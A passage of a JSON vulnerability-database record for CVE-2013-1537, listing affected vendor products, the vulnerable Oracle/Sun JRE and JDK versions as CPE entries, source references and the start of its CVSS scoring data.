"7.1.1" }, { "model": "linux enterprise desktop sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "linux enterprise software development kit sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.1" }, { "model": "nonstop server j06.09.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "nonstop server h06.17.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "nonstop server j06.10.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "nonstop server h06.25.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.18.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.27", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "nonstop server h06.17.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.14.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" } ], "sources": [ { "db": "BID", "id": "59194" }, { "db": "CNNVD", "id": "CNNVD-201304-359" }, { "db": "NVD", "id": "CVE-2013-1537" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update17:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update17:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update43:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update43:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update41:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update41:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1537" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "121631" }, { "db": "PACKETSTORM", "id": "121703" }, { "db": "PACKETSTORM", "id": "123735" } ], "trust": 0.4 }, "cve": "CVE-2013-1537", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-1537", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": 